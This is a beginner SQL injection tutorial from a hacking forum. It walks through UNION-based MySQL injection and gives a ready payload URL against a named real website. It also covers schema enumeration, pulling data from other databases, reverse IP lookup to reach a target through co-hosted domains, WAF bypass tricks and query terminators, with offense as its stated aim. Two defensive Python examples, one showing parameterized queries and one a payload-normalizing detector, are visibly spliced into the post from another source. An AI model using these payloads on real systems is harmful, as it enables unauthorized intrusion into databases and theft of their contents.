[TUT] BASIC GUIDE - SQL INJECTION - part 3 [BEGINNER]

Posted by Myanmar H4x0r on - -




SYSTEM VARIABLES
Again the query for getting VERSION, USER and DATABASE:

Code:
http://www.apropos-verlag.ch/index.php?tid=2&id=0&sid=500&book=0 UNION ALL SELECT 1,2,VERSION(),USER(),DATABASE(),6,7,8,9,10--

I already explained that VERSION(), USER() and DATABASE() are system variables. But of course these are not the only ones.
Note that the variables are not always the same on different SQL servers (MySQL, MSSQL, PostgreSQL, ...)!
The next thing is: be smart and creative! For every SQL server you will find tons of information on the web.
For MySQL I strongly recommend https://dev.mysql.com/ again. You will find all the info about MySQL servers in there. BOOKMARK THIS!

Some examples of other system variables for MySQL servers are:
@@VERSION_COMPILE_OS // operating system of the target-server
@@HOSTNAME // hostname hehe
@@DATADIR // you see we also can get some info about folder structure
@@LOG_ERROR // location of the error logging file

Some synonyms for EQUAL output:
VERSION()
@@GLOBAL.VERSION
@@VERSION


USER()
CURRENT_USER()
SYSTEM_USER()


DATABASE()
SCHEMA()
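Why the `id=0 UNION ALL SELECT ...` above works at all, shown from the application side as an added example (not code from the post or the site it mentions): the request parameter is glued into the SQL text, so a UNION appended to it gets executed, while the parameterized version only ever sends it as a value. SQLite stands in for MySQL here and the tables (book, member) are constructed for the demo.

```python
import sqlite3


def setup_demo_db() -> sqlite3.Connection:
    """Constructed stand-in (SQLite) for the MySQL schema behind a page like the one above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE book (id INTEGER, title TEXT);
        INSERT INTO book VALUES (1, 'Alpha'), (2, 'Beta');
        CREATE TABLE member (id INTEGER, name TEXT);
        INSERT INTO member VALUES (7, 'admin');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The request parameter is spliced into the SQL text: whatever follows the
    number becomes part of the statement, which is what lets
    'id=0 UNION ALL SELECT ...' return rows from a completely different table."""
    sql = "SELECT id, title FROM book WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, raw_id: str):
    """Fix: validate the type, then bind the value through a placeholder so the
    driver sends it as data, never as SQL. Rejected input should be logged, and
    database errors must not be echoed back to the client."""
    try:
        book_id = int(raw_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM book WHERE id = ?", (book_id,)).fetchall()


# Constructed input modelled on the UNION injection shown in the post
INJECTED = "0 UNION ALL SELECT id, name FROM member"

if __name__ == "__main__":
    db = setup_demo_db()
    print(lookup_vulnerable(db, INJECTED))      # [(7, 'admin')]  rows from another table
    print(lookup_parameterized(db, INJECTED))   # []              rejected before the DB
    print(lookup_parameterized(db, "2"))        # [(2, 'Beta')]
```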


ALTERNATIVE QUERIES FOR SAME RESULT
We can grab the same information from different locations in the INFORMATION_SCHEMA database. 
This helps when some keywords are filtered by a WAF or similar. Some examples listed below:

examples for alternative queries for finding all databases:

Code:
(SELECT GROUP_CONCAT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(table_schema) FROM INFORMATION_SCHEMA.STATISTICS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(table_schema) FROM INFORMATION_SCHEMA.PARTITIONS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)

examples for tables:

Code:
(SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.STATISTICS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.PARTITIONS WHERE table_schema = DATABASE())

for columns:

Code:
(SELECT GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.STATISTICS WHERE table_schema = DATABASE())
(SELECT GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE WHERE table_schema = DATABASE())

Keep that in mind and take the time to check all tables of the INFORMATION_SCHEMA database: https://dev.mysql.com/doc/refman/5.0/en/...chema.html
And remember: THIS SYSTEM DATABASE IS ONLY AVAILABLE IN MYSQL VERSIONS 5 AND ABOVE!

GRAB DATA FROM OTHER DATABASES
I will now show you how to pick data from a database other than the current one.
Let's say the other database (not the current one) is called test and it has a table called member with columns named id and name.
The queries to receive the results would look like this:

Tables:

PHP Code:
(SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x74657374) 

Columns:

PHP Code:
(SELECT GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 0x6d656d626572) 

Data:

PHP Code:
(SELECT GROUP_CONCAT(id,name) FROM test.member) 

Explanation:
The first two queries are similar to the ones from the UNION part of the tutorial. Again the database name (test) and the table name (member) are given in HEX. To receive the data (values) of the table member (located in database test) we change the FROM part to:
FROM DATABASE.TABLE = FROM test.member (again, no need for HEX when grabbing data directly)

FIND OTHER DOMAINS ON SAME SERVER
If you have a specific target but it is not vulnerable, you can try to find other domains located on the same server and try to inject those to maybe grab data of your preferred target!
This search technique is called "Reverse IP Lookup".
Check this page and enter your target domain address in the input field: Reverse IP Domain Check

COMBINE STATEMENTS
Now you already know how injection queries work, but not yet how to combine several of them in one column. For that we use various functions. I will explain the most used one: CONCAT()

Explanation:
CONCAT() - „Returns the string that results from concatenating the arguments“.
So with that MySQL string function we can combine as many queries as we want and they will all fit in one vulnerable column.
NOTE: We have to separate each SELECT query with a comma!

PHP Code:
CONCAT(
(SELECT GROUP_CONCAT(table_schema) FROM INFORMATION_SCHEMA.STATISTICS WHERE table_schema = DATABASE()),
(SELECT GROUP_CONCAT(table_schema) FROM INFORMATION_SCHEMA.PARTITIONS WHERE table_schema = DATABASE())
)

WAF BYPASS
Web Application Firewall means a piece of software (a script, etc.) which tries to prevent SQL injections (for example). It works in different ways and in most cases each WAF is different. A WAF mostly filters keywords, for example SELECT, UNION, FROM, WHERE and so on (it depends on the WAF what exactly is filtered). Some WAFs are easy to bypass, some are unbreakable; you will see such WAFs at work many times. I will now list some basic ways to bypass a WAF. We have some very detailed tutorials about that topic and I will link them after a short explanation:

C-style comments:
Many WAFs are written in the programming language C, so sometimes we can easily bypass them by wrapping the keywords in comments of that programming language:

UNION ALL /*!SELECT*/ 1,2,3,4,5,6,7,8
UNION ALL /*!500000SELECT*/ 1,2,3,4,5,6,7,8
/*UNION*/ ALL /*SELECT*/ 1,2,3,4,5,6,7,8

URL encoding:
You may have seen this when URLs are transmitted. Basically it means converting characters to HEX and putting a % in front:
%75nion all %73elect 1,2,3,4,5

Example of a SELECT query with some keyword chars URL encoded:

PHP Code:
(%53ELECT GROUP_CONCAT(%74able_schema) %46ROM INFORMATION_SCHEMA.STATISTICS %57HERE %74able_schema = DATABASE()) 
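The two bypasses above get past a signature that matches keywords as whole words in the raw request, because `%53ELECT` never contains the word and `/*!50000SELECT*/` glues digits onto it. Added example (not from the post or any real WAF product) of the normalization a detector has to do before matching, percent-decoding and stripping MySQL comment delimiters, run over constructed query strings modelled on the post's payloads.

```python
import re
from urllib.parse import unquote_plus

# Keywords the post says WAFs commonly look for, matched as whole words the
# way a simple signature rule would.
KEYWORD_RE = re.compile(
    r"\b(UNION|SELECT|FROM|WHERE|INFORMATION_SCHEMA|GROUP_CONCAT)\b", re.I)


def naive_filter(raw_query: str) -> bool:
    """Signature check on the raw query string, without any decoding."""
    return KEYWORD_RE.search(raw_query) is not None


def normalize(raw_query: str) -> str:
    """Undo the obfuscations shown in the post before matching:
    - percent-decoding, repeated for double-encoded input (%2553 -> %53 -> S)
    - MySQL version comments /*!50000SELECT*/, whose body the server executes
    - remaining /* */ delimiters, so a keyword wrapped in comments is exposed
    """
    s = raw_query
    for _ in range(3):                   # bounded, so odd input cannot loop forever
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*", " ", s)       # drop the '/*!50000' opener, keep the body
    s = re.sub(r"/\*|\*/", " ", s)       # drop any comment delimiters left over
    return re.sub(r"\s+", " ", s).strip()


def is_suspicious(raw_query: str) -> bool:
    """Same signature as naive_filter, applied after normalization."""
    return KEYWORD_RE.search(normalize(raw_query)) is not None


# Constructed request query strings modelled on the post's examples
SAMPLES = {
    "plain":   "id=0 UNION ALL SELECT 1,2,VERSION(),USER(),DATABASE()",
    "urlenc":  "id=0 %75nion all %73elect 1,2,3,4,5",
    "comment": "id=0 /*!50000UNION*/ ALL /*!50000SELECT*/ 1,2,3,4,5",
    "benign":  "tid=2&id=42&sid=500&book=0",
}

if __name__ == "__main__":
    for name, q in SAMPLES.items():
        print(f"{name:8} naive={naive_filter(q)!s:5} normalized={is_suspicious(q)}")
```

Only the plain payload trips the naive check; after normalization all three injected samples are flagged and the benign request still passes.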

COMMENT OUT THE ORIGINAL QUERY
Sometimes we need to comment out the rest of the original query. I used the two dashes (--) at the end of the injected query for that in our example.
That is mostly used for INT based queries. For string based ones, --+- or %23 is used most of the time. Below are some others you can try:

Code:
--
--+-
+--+ /
--+X
/*
%23
%60

;
and 0
OR 1=2
and 4=5
and false

TOOLS
Don't use any automated tools (like Havij or sqlmap)!!! Do it the manual way with the URL bar of your browser.
For a lil help you can try the Mozilla Hackbar:
https://addons.mozilla.org/de/firefox/addon/hackbar/. 
I did a lil modification of that extension. If you want you can check it out here:
[TOOL] t.PRO Hackbar mod 1.4.2 [/TOOL]

credit:T-pro